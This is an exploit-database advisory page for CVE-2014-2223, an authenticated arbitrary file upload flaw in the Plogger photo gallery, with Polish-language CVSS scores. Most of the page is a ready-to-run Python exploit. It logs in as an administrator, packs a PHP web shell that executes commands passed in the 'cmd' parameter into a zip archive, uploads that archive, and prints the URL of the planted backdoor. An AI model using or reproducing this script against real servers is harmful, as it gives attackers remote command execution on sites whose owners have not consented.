Plogger Authenticated Arbitrary File Upload

2014-08-29 / 2014-09-20
Credit: b0z
Risk: High
Local: No
Remote: Yes
CWE: CWE-264


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

#!/usr/bin/env python # Exploit Title: Plogger Authenticated Arbitrary File Upload # Date: Feb 2014 # Exploit Author: b0z # Vendor Homepage: www.plogger.org # Software Link: www.plogger.org/download # Version: Plogger prior to 1.0-RC1 # CVE : 2014-2223 import hashlib import os import zipfile import requests import time import argparse def login(session,host,username,password): print "[+] Log in" session.post('http://%s/plog-admin/plog-upload.php' % host, data={ "plog_username": username, "plog_password": password, "action": "log_in" }) def upload(session): print "[+] Creating poisoned gift" ## Write the backdoor backdoor = open(magic + '.php', 'w+', buffering = 0) backdoor.write("<?php system($_GET['cmd']) ?>") backdoor.close # Add true image file to block the race condition (mandatory not null) image = open(magic + '.png', 'w+', buffering = 0) image.write('A') image.close gift = zipfile.ZipFile(magic + '.zip', mode = 'w') gift.write(magic + '.php') gift.write(magic + '.png') gift.close os.remove(magic + '.php') os.remove(magic + '.png') gift = open(magic + '.zip', 'rb') files= { "userfile": ("archive.zip", gift)} session.post('http://%s/plog-admin/plog-upload.php' % host, files=files, data = { "destination_radio":"existing", "albums_menu" : "1", "new_album_name":"", "collections_menu":"1", "upload":"Upload" }) os.remove(magic + '.zip') print '[+] Here we go ==> http://%s/plog-content/uploads/archive/%s.php' % (host,magic) if __name__== "__main__": parser = argparse.ArgumentParser() parser.add_argument("--host" , help="Remote host",required=True) parser.add_argument("--user" , help="Username",required=True) parser.add_argument("--password" , help="Password",required=True) args = parser.parse_args() host = args.host username = args.user password = args.user magic = hashlib.sha1(time.asctime()).hexdigest() session = requests.session() login(session,host,username,password) upload(session)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top